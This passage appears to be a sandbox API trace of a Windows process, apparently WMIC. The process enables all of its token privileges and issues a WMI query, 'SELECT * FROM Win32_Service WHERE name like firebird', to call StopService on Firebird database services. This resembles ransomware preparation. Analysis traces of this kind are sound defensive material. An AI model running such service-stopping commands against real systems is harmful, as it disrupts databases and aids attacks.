[0290.400] SafeArrayGetUBound (in: psa=0x35a1600, nDim=0x1, plUbound=0x2f8d034 | out: plUbound=0x2f8d034) returned 0x0 [0290.400] SafeArrayGetElement (in: psa=0x35a1600, rgIndices=0x2f8d040, pv=0x2f8d050 | out: pv=0x2f8d050) returned 0x0 [0290.400] malloc (_Size=0x24) returned 0x381b9f8 [0290.400] IWbemClassObject:GetPropertyQualifierSet (in: This=0x35a0cd8, wszProperty="ReturnValue", ppQualSet=0x2f8cf60 | out: ppQualSet=0x2f8cf60*=0x354b140) returned 0x0 [0290.400] malloc (_Size=0xc) returned 0x381abb8 [0290.400] IWbemQualifierSet:Get (in: This=0x354b140, wszName="CIMTYPE", lFlags=0, pVal=0x2f8cf30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x2f8cf30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="uint32", varVal2=0x0), plFlavor=0x0) returned 0x0 [0290.401] free (_Block=0x381abb8) [0290.401] malloc (_Size=0xc) returned 0x381abb8 [0290.401] IWbemClassObject:Get (in: This=0x35a0cd8, wszName="ReturnValue", lFlags=0, pVal=0x2f8cf08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2f8cf44*=49860396, plFlavor=0x0 | out: pVal=0x2f8cf08*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2f8cf44*=19, plFlavor=0x0) returned 0x0 [0290.401] malloc (_Size=0xc) returned 0x381aed0 [0290.401] IWbemQualifierSet:Get (in: This=0x354b140, wszName="read", lFlags=0, pVal=0x2f8cf48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x2f8cf48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0290.401] free (_Block=0x381aed0) [0290.401] malloc (_Size=0xc) returned 0x381aed0 [0290.401] IWbemQualifierSet:Get (in: This=0x354b140, wszName="write", lFlags=0, pVal=0x2f8cf48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x2f8cf48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0290.401] free (_Block=0x381aed0) [0290.401] malloc (_Size=0xc) returned 0x381ae28 [0290.402] malloc (_Size=0xc) returned 0x381aeb8 [0290.402] IWbemQualifierSet:Get (in: This=0x354b140, wszName="Description", lFlags=0, pVal=0x2f8cf20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x2f8cf20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0290.402] free (_Block=0x381aeb8) [0290.402] malloc (_Size=0xc) returned 0x381ae40 [0290.402] lstrlenA (lpString="Not Available") returned 13 [0290.402] malloc (_Size=0x1c) returned 0x381ba28 [0290.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa21d94, cbMultiByte=-1, lpWideCharStr=0x381ba28, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0290.402] free (_Block=0x381ba28) [0290.402] IUnknown:Release (This=0x354b140) returned 0x0 [0290.402] malloc (_Size=0x24) returned 0x381ba28 [0290.402] malloc (_Size=0xc) returned 0x381ae70 [0290.402] malloc (_Size=0x24) returned 0x381ba58 [0290.402] malloc (_Size=0x38) returned 0x381ba88 [0290.402] malloc (_Size=0x24) returned 0x381bac8 [0290.402] free (_Block=0x381ba58) [0290.402] free (_Block=0x381ba28) [0290.402] free (_Block=0x381b9f8) [0290.403] free (_Block=0x381ae28) [0290.403] free (_Block=0x381ae40) [0290.403] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0290.403] IWbemClassObject:GetMethodQualifierSet (in: This=0x35a0ae0, wszMethod="StopService", ppQualSet=0x2f8d454 | out: ppQualSet=0x2f8d454*=0x3574e88) returned 0x0 [0290.403] malloc (_Size=0xc) returned 0x381ae10 [0290.403] IWbemQualifierSet:Get (in: This=0x3574e88, wszName="Implemented", lFlags=0, pVal=0x2f8d43c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x2f8d43c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0290.403] free (_Block=0x381ae10) [0290.403] malloc (_Size=0xc) returned 0x381aed0 [0290.403] malloc (_Size=0xc) returned 0x381ae88 [0290.403] IWbemQualifierSet:Get (in: This=0x3574e88, wszName="Description", lFlags=0, pVal=0x2f8d42c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x2f8d42c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error. It returns one of the following integer values:\n0 - The request was accepted.\n1 - The request is not supported.\n2 - The user did not have the necessary access.\n3 - The service cannot be stopped because other services that are running are dependent on it.\n4 - The requested control code is not valid, or it is unacceptable to the service.\n5 - The requested control code cannot be sent to the service because the state of the service (Win32_BaseService:State) is equal to 0, 1, or 2.\n6 - The service has not been started.\n7 - The service did not respond to the start request in a timely fashion.\n8 - Unknown failure when starting the service.\n9 - The directory path to the service executable was not found.\n10 - The service is already running.\n11 - The database to add a new service is locked.\n12 - A dependency for which this service relies on has been removed from the system.\n13 - The service failed to find the service needed from a dependent service.\n14 - The service has been disabled from the system.\n15 - The service does not have the correct authentication to run on the system.\n16 - This service is being removed from the system.\n17 - There is no execution thread for the service.\n18 - There are circular dependencies when starting the service.\n19 - There is a service running under the same name.\n20 - There are invalid characters in the name of the service.\n21 - Invalid parameters have been passed to the service.\n22 - The account, which this service is to run under is either invalid or lacks the permissions to run the service.\n23 - The service exists in the database of services available from the system.\n24 - The service is currently paused in the system.\nOther - For integer values other than those listed above, refer to Win32 error code documentation.", varVal2=0x0), plFlavor=0x0) returned 0x0 [0290.405] free (_Block=0x381ae88) [0290.405] malloc (_Size=0xc) returned 0x381ae40 [0290.405] IUnknown:Release (This=0x3574e88) returned 0x0 [0290.405] malloc (_Size=0x38) returned 0x381b9f8 [0290.405] malloc (_Size=0x38) returned 0x381ba38 [0290.405] malloc (_Size=0x24) returned 0x381baf8 [0290.405] malloc (_Size=0xc) returned 0x381ae58 [0290.405] malloc (_Size=0x38) returned 0x381bb28 [0290.405] malloc (_Size=0x38) returned 0x381bb68 [0290.405] malloc (_Size=0x24) returned 0x381bba8 [0290.405] malloc (_Size=0x28) returned 0x381bbd8 [0290.405] malloc (_Size=0x38) returned 0x381bc08 [0290.405] malloc (_Size=0x38) returned 0x381bc48 [0290.405] malloc (_Size=0x24) returned 0x381bc88 [0290.405] free (_Block=0x381bba8) [0290.405] free (_Block=0x381bb68) [0290.405] free (_Block=0x381bb28) [0290.405] free (_Block=0x381baf8) [0290.405] free (_Block=0x381ba38) [0290.406] free (_Block=0x381b9f8) [0290.406] IUnknown:Release (This=0x35a0cd8) returned 0x0 [0290.406] free (_Block=0x381bac8) [0290.406] free (_Block=0x381ba88) [0290.406] free (_Block=0x381b9b8) [0290.406] IWbemClassObject:NextMethod (in: This=0x35a0ae0, lFlags=0, pstrName=0x2f8d4f8*=0x0, ppInSignature=0x2f8d4f4*=0x0, ppOutSignature=0x2f8d4f0*=0x0 | out: pstrName=0x2f8d4f8*="PauseService", ppInSignature=0x2f8d4f4*=0x0, ppOutSignature=0x2f8d4f0*=0x3577170) returned 0x0 [0290.406] lstrlenW (lpString="PauseService") returned 12 [0290.406] lstrlenW (lpString="stopservice") returned 11 [0290.406] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="PauseService", cchCount2=12) returned 3 [0290.406] IUnknown:Release (This=0x3577170) returned 0x0 [0290.406] IWbemClassObject:NextMethod (in: This=0x35a0ae0, lFlags=0, pstrName=0x2f8d4f8*=0x0, ppInSignature=0x2f8d4f4*=0x0, ppOutSignature=0x2f8d4f0*=0x0 | out: pstrName=0x2f8d4f8*="ResumeService", ppInSignature=0x2f8d4f4*=0x0, ppOutSignature=0x2f8d4f0*=0x3577170) returned 0x0 [0290.406] lstrlenW (lpString="ResumeService") returned 13 [0290.406] lstrlenW (lpString="stopservice") returned 11 [0290.406] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ResumeService", cchCount2=13) returned 3 [0290.406] IUnknown:Release (This=0x3577170) returned 0x0 [0290.406] IWbemClassObject:NextMethod (in: This=0x35a0ae0, lFlags=0, pstrName=0x2f8d4f8*=0x0, ppInSignature=0x2f8d4f4*=0x0, ppOutSignature=0x2f8d4f0*=0x0 | out: pstrName=0x2f8d4f8*="InterrogateService", ppInSignature=0x2f8d4f4*=0x0, ppOutSignature=0x2f8d4f0*=0x3577170) returned 0x0 [0290.406] lstrlenW (lpString="InterrogateService") returned 18 [0290.407] lstrlenW (lpString="stopservice") returned 11 [0290.407] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="InterrogateService", cchCount2=18) returned 3 [0290.407] IUnknown:Release (This=0x3577170) returned 0x0 [0290.407] IWbemClassObject:NextMethod (in: This=0x35a0ae0, lFlags=0, pstrName=0x2f8d4f8*=0x0, ppInSignature=0x2f8d4f4*=0x0, ppOutSignature=0x2f8d4f0*=0x0 | out: pstrName=0x2f8d4f8*="UserControlService", ppInSignature=0x2f8d4f4*=0x35a0cd8, ppOutSignature=0x2f8d4f0*=0x35a3608) returned 0x0 [0290.407] lstrlenW (lpString="UserControlService") returned 18 [0290.407] lstrlenW (lpString="stopservice") returned 11 [0290.407] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="UserControlService", cchCount2=18) returned 1 [0290.407] IUnknown:Release (This=0x35a0cd8) returned 0x0 [0290.407] IUnknown:Release (This=0x35a3608) returned 0x0 [0290.407] IWbemClassObject:NextMethod (in: This=0x35a0ae0, lFlags=0, pstrName=0x2f8d4f8*=0x0, ppInSignature=0x2f8d4f4*=0x0, ppOutSignature=0x2f8d4f0*=0x0 | out: pstrName=0x2f8d4f8*="Create", ppInSignature=0x2f8d4f4*=0x35a0cd8, ppOutSignature=0x2f8d4f0*=0x35a5760) returned 0x0 [0290.408] lstrlenW (lpString="Create") returned 6 [0290.408] lstrlenW (lpString="stopservice") returned 11 [0290.408] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Create", cchCount2=6) returned 3 [0290.408] IUnknown:Release (This=0x35a0cd8) returned 0x0 [0290.408] IUnknown:Release (This=0x35a5760) returned 0x0 [0290.408] IWbemClassObject:NextMethod (in: This=0x35a0ae0, lFlags=0, pstrName=0x2f8d4f8*=0x0, ppInSignature=0x2f8d4f4*=0x0, ppOutSignature=0x2f8d4f0*=0x0 | out: pstrName=0x2f8d4f8*="Change", ppInSignature=0x2f8d4f4*=0x35a0cd8, ppOutSignature=0x2f8d4f0*=0x35a54e0) returned 0x0 [0290.408] lstrlenW (lpString="Change") returned 6 [0290.408] lstrlenW (lpString="stopservice") returned 11 [0290.408] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Change", cchCount2=6) returned 3 [0290.408] IUnknown:Release (This=0x35a0cd8) returned 0x0 [0290.408] IUnknown:Release (This=0x35a54e0) returned 0x0 [0290.408] IWbemClassObject:NextMethod (in: This=0x35a0ae0, lFlags=0, pstrName=0x2f8d4f8*=0x0, ppInSignature=0x2f8d4f4*=0x0, ppOutSignature=0x2f8d4f0*=0x0 | out: pstrName=0x2f8d4f8*="ChangeStartMode", ppInSignature=0x2f8d4f4*=0x35a0cd8, ppOutSignature=0x2f8d4f0*=0x35a3790) returned 0x0 [0290.409] lstrlenW (lpString="ChangeStartMode") returned 15 [0290.409] lstrlenW (lpString="stopservice") returned 11 [0290.409] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ChangeStartMode", cchCount2=15) returned 3 [0290.409] IUnknown:Release (This=0x35a0cd8) returned 0x0 [0290.409] IUnknown:Release (This=0x35a3790) returned 0x0 [0290.409] IWbemClassObject:NextMethod (in: This=0x35a0ae0, lFlags=0, pstrName=0x2f8d4f8*=0x0, ppInSignature=0x2f8d4f4*=0x0, ppOutSignature=0x2f8d4f0*=0x0 | out: pstrName=0x2f8d4f8*="Delete", ppInSignature=0x2f8d4f4*=0x0, ppOutSignature=0x2f8d4f0*=0x3577170) returned 0x0 [0290.409] lstrlenW (lpString="Delete") returned 6 [0290.409] lstrlenW (lpString="stopservice") returned 11 [0290.409] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Delete", cchCount2=6) returned 3 [0290.409] IUnknown:Release (This=0x3577170) returned 0x0 [0290.409] IWbemClassObject:NextMethod (in: This=0x35a0ae0, lFlags=0, pstrName=0x2f8d4f8*=0x0, ppInSignature=0x2f8d4f4*=0x0, ppOutSignature=0x2f8d4f0*=0x0 | out: pstrName=0x2f8d4f8*="GetSecurityDescriptor", ppInSignature=0x2f8d4f4*=0x0, ppOutSignature=0x2f8d4f0*=0x35a0cd8) returned 0x0 [0290.409] lstrlenW (lpString="GetSecurityDescriptor") returned 21 [0290.409] lstrlenW (lpString="stopservice") returned 11 [0290.409] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="GetSecurityDescriptor", cchCount2=21) returned 3 [0290.409] IUnknown:Release (This=0x35a0cd8) returned 0x0 [0290.409] IWbemClassObject:NextMethod (in: This=0x35a0ae0, lFlags=0, pstrName=0x2f8d4f8*=0x0, ppInSignature=0x2f8d4f4*=0x0, ppOutSignature=0x2f8d4f0*=0x0 | out: pstrName=0x2f8d4f8*="SetSecurityDescriptor", ppInSignature=0x2f8d4f4*=0x35a0cd8, ppOutSignature=0x2f8d4f0*=0x35a3608) returned 0x0 [0290.410] lstrlenW (lpString="SetSecurityDescriptor") returned 21 [0290.410] lstrlenW (lpString="stopservice") returned 11 [0290.410] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="SetSecurityDescriptor", cchCount2=21) returned 3 [0290.410] IUnknown:Release (This=0x35a0cd8) returned 0x0 [0290.410] IUnknown:Release (This=0x35a3608) returned 0x0 [0290.410] IWbemClassObject:NextMethod (in: This=0x35a0ae0, lFlags=0, pstrName=0x2f8d4f8*=0x0, ppInSignature=0x2f8d4f4*=0x0, ppOutSignature=0x2f8d4f0*=0x0 | out: pstrName=0x2f8d4f8*=0x0, ppInSignature=0x2f8d4f4*=0x0, ppOutSignature=0x2f8d4f0*=0x0) returned 0x40005 [0290.410] IUnknown:Release (This=0x35a0ae0) returned 0x0 [0290.410] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0290.410] lstrlenW (lpString="SET") returned 3 [0290.410] lstrlenW (lpString="call") returned 4 [0290.410] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0290.410] lstrlenW (lpString="CREATE") returned 6 [0290.410] lstrlenW (lpString="call") returned 4 [0290.410] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0290.410] free (_Block=0x3812b80) [0290.410] malloc (_Size=0x4) returned 0x3812ee8 [0290.410] lstrlenW (lpString="GET") returned 3 [0290.410] lstrlenW (lpString="call") returned 4 [0290.410] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0290.410] lstrlenW (lpString="LIST") returned 4 [0290.411] lstrlenW (lpString="call") returned 4 [0290.411] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0290.411] lstrlenW (lpString="ASSOC") returned 5 [0290.411] lstrlenW (lpString="call") returned 4 [0290.411] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0290.411] WbemLocator:IUnknown:AddRef (This=0x35447f0) returned 0x3 [0290.411] free (_Block=0x3812788) [0290.411] lstrlenW (lpString="") returned 0 [0290.411] lstrlenW (lpString="NQDPDE") returned 6 [0290.411] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0290.411] lstrlenW (lpString="NQDPDE") returned 6 [0290.411] malloc (_Size=0xe) returned 0x381ae88 [0290.411] lstrlenW (lpString="NQDPDE") returned 6 [0290.411] GetCurrentThreadId () returned 0x11d4 [0290.411] GetCurrentProcess () returned 0xffffffff [0290.411] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x2f8f5d4 | out: TokenHandle=0x2f8f5d4*=0x2f8) returned 1 [0290.411] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x2f8f5d0 | out: TokenInformation=0x0, ReturnLength=0x2f8f5d0) returned 0 [0290.411] malloc (_Size=0x118) returned 0x381b9b8 [0290.411] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x381b9b8, TokenInformationLength=0x118, ReturnLength=0x2f8f5d0 | out: TokenInformation=0x381b9b8, ReturnLength=0x2f8f5d0) returned 1 [0290.411] AdjustTokenPrivileges (in: TokenHandle=0x2f8, DisableAllPrivileges=0, NewState=0x381b9b8*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0290.411] free (_Block=0x381b9b8) [0290.412] CloseHandle (hObject=0x2f8) returned 1 [0290.412] lstrlenW (lpString="GET") returned 3 [0290.412] lstrlenW (lpString="call") returned 4 [0290.412] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0290.412] lstrlenW (lpString="LIST") returned 4 [0290.412] lstrlenW (lpString="call") returned 4 [0290.412] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0290.412] lstrlenW (lpString="SET") returned 3 [0290.412] lstrlenW (lpString="call") returned 4 [0290.412] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0290.412] lstrlenW (lpString="CALL") returned 4 [0290.412] lstrlenW (lpString="call") returned 4 [0290.412] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0290.412] ??0CHString@@QAE@XZ () returned 0x2f8f594 [0290.412] GetCurrentThreadId () returned 0x11d4 [0290.412] malloc (_Size=0xc) returned 0x381aea0 [0290.412] malloc (_Size=0xc) returned 0x381aeb8 [0290.412] malloc (_Size=0xc) returned 0x381ae10 [0290.412] malloc (_Size=0xc) returned 0x381ae28 [0290.413] malloc (_Size=0xc) returned 0x38199a0 [0290.413] SysStringLen (param_1="\\\\") returned 0x2 [0290.413] SysStringLen (param_1="NQDPDE") returned 0x6 [0290.413] malloc (_Size=0xc) returned 0x381bfa0 [0290.413] SysStringLen (param_1="\\\\NQDPDE") returned 0x8 [0290.413] SysStringLen (param_1="\\") returned 0x1 [0290.413] malloc (_Size=0xc) returned 0x381bd78 [0290.413] SysStringLen (param_1="\\\\NQDPDE\\") returned 0x9 [0290.413] SysStringLen (param_1="root\\cimv2") returned 0xa [0290.413] free (_Block=0x381bfa0) [0290.413] free (_Block=0x38199a0) [0290.413] free (_Block=0x381ae28) [0290.414] free (_Block=0x381ae10) [0290.414] free (_Block=0x381aeb8) [0290.414] free (_Block=0x381aea0) [0290.414] malloc (_Size=0xc) returned 0x381bd90 [0290.414] malloc (_Size=0xc) returned 0x381be08 [0290.414] malloc (_Size=0xc) returned 0x381bd48 [0290.414] WbemLocator:IWbemLocator:ConnectServer (in: This=0x35447f0, strNetworkResource="\\\\NQDPDE\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa68564 | out: ppNamespace=0xa68564*=0x35a1578) returned 0x0 [0290.426] free (_Block=0x381bd48) [0290.426] free (_Block=0x381be08) [0290.426] free (_Block=0x381bd90) [0290.427] CoSetProxyBlanket (pProxy=0x35a1578, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0290.427] free (_Block=0x381bd78) [0290.427] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0290.427] ??0CHString@@QAE@XZ () returned 0x2f8f58c [0290.427] GetCurrentThreadId () returned 0x11d4 [0290.427] malloc (_Size=0x38) returned 0x381b9b8 [0290.427] malloc (_Size=0x28) returned 0x381b9f8 [0290.427] malloc (_Size=0x28) returned 0x381ba28 [0290.427] malloc (_Size=0x38) returned 0x381ba58 [0290.428] malloc (_Size=0x38) returned 0x381ba98 [0290.428] malloc (_Size=0x24) returned 0x381bad8 [0290.428] malloc (_Size=0xc) returned 0x381aea0 [0290.428] lstrlenA (lpString="") returned 0 [0290.428] malloc (_Size=0x2) returned 0x3812788 [0290.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x3812788, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0290.428] free (_Block=0x3812788) [0290.428] malloc (_Size=0x38) returned 0x381bb08 [0290.428] malloc (_Size=0x24) returned 0x381bb48 [0290.429] malloc (_Size=0xc) returned 0x381aeb8 [0290.429] free (_Block=0x381aea0) [0290.429] IWbemServices:GetObject (in: This=0x35a1578, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x2f8f564*=0x0, ppCallResult=0x0 | out: ppObject=0x2f8f564*=0x35a0ae0, ppCallResult=0x0) returned 0x0 [0290.572] malloc (_Size=0xc) returned 0x381aea0 [0290.572] IWbemClassObject:GetMethod (in: This=0x35a0ae0, wszName="stopservice", lFlags=0, ppInSignature=0x2f8f580, ppOutSignature=0x2f8f560 | out: ppInSignature=0x2f8f580*=0x0, ppOutSignature=0x2f8f560*=0x35a0cd8) returned 0x0 [0290.573] free (_Block=0x381aea0) [0290.573] IUnknown:Release (This=0x35a0cd8) returned 0x0 [0290.573] IUnknown:Release (This=0x35a0ae0) returned 0x0 [0290.573] ??0CHString@@QAE@XZ () returned 0x2f8f444 [0290.573] GetCurrentThreadId () returned 0x11d4 [0290.573] malloc (_Size=0xc) returned 0x381aea0 [0290.573] lstrlenA (lpString="") returned 0 [0290.573] malloc (_Size=0x2) returned 0x3812788 [0290.573] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x3812788, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0290.573] free (_Block=0x3812788) [0290.573] malloc (_Size=0xc) returned 0x381ae10 [0290.573] lstrlenA (lpString="") returned 0 [0290.573] malloc (_Size=0x2) returned 0x3812788 [0290.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x3812788, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0290.574] free (_Block=0x3812788) [0290.574] malloc (_Size=0xc) returned 0x381ae28 [0290.574] free (_Block=0x381ae10) [0290.574] malloc (_Size=0xc) returned 0x381ae10 [0290.574] lstrlenA (lpString="SELECT * FROM ") returned 14 [0290.574] malloc (_Size=0x1e) returned 0x381bb78 [0290.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa24354, cbMultiByte=-1, lpWideCharStr=0x381bb78, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0290.574] free (_Block=0x381bb78) [0290.574] malloc (_Size=0xc) returned 0x38199a0 [0290.574] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0290.574] SysStringLen (param_1="Win32_Service") returned 0xd [0290.574] free (_Block=0x381ae10) [0290.574] malloc (_Size=0xc) returned 0x381ae10 [0290.574] malloc (_Size=0xc) returned 0x381c078 [0290.574] lstrlenA (lpString=" WHERE ") returned 7 [0290.575] malloc (_Size=0x10) returned 0x381c090 [0290.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa237a8, cbMultiByte=-1, lpWideCharStr=0x381c090, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0290.575] free (_Block=0x381c090) [0290.575] malloc (_Size=0xc) returned 0x381c090 [0290.575] SysStringLen (param_1=" WHERE ") returned 0x7 [0290.575] SysStringLen (param_1="name like '%%firebird%%'") returned 0x18 [0290.575] malloc (_Size=0xc) returned 0x381c060 [0290.575] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0290.575] SysStringLen (param_1=" WHERE name like '%%firebird%%'") returned 0x1f [0290.575] free (_Block=0x38199a0) [0290.575] free (_Block=0x381c090) [0290.575] free (_Block=0x381c078) [0290.575] free (_Block=0x381ae10) [0290.575] malloc (_Size=0xc) returned 0x381c000 [0290.576] IWbemServices:ExecQuery (in: This=0x35a1578, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE name like '%%firebird%%'", lFlags=48, pCtx=0x0, ppEnum=0x2f8f450 | out: ppEnum=0x2f8f450*=0x35a4920) returned 0x0 [0290.590] free (_Block=0x381c000) [0290.590] CoSetProxyBlanket (pProxy=0x35a4920, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0290.597] IEnumWbemClassObject:Next (in: This=0x35a4920, lTimeout=-1, uCount=0x1, apObjects=0x2f8f44c, puReturned=0x2f8f43c | out: apObjects=0x2f8f44c*=0x0, puReturned=0x2f8f43c*=0x0) returned 0x1 [0291.998] IUnknown:Release (This=0x35a4920) returned 0x0 [0292.004] free (_Block=0x381c060) [0292.004] free (_Block=0x381ae28) [0292.004] free (_Block=0x381aea0) [0292.004] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0292.004] free (_Block=0x381aeb8) [0292.004] free (_Block=0x381bad8) [0292.005] free (_Block=0x381ba98) [0292.005] free (_Block=0x381ba58) [0292.005] free (_Block=0x381ba28) [0292.005] free (_Block=0x381b9f8) [0292.005] free (_Block=0x381bb48) [0292.005] free (_Block=0x381bb08) [0292.005] free (_Block=0x381b9b8) [0292.005] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0292.005] GetCurrentThreadId () returned 0x11d4 [0292.005] ??0CHString@@QAE@PBG@Z () returned 0x2f8f604 [0292.005] ??YCHString@@QAEABV0@PBG@Z () returned 0x2f8f604 [0292.005] malloc (_Size=0x800) returned 0x381c0c0 [0292.006] LoadStringW (in: hInstance=0x0, 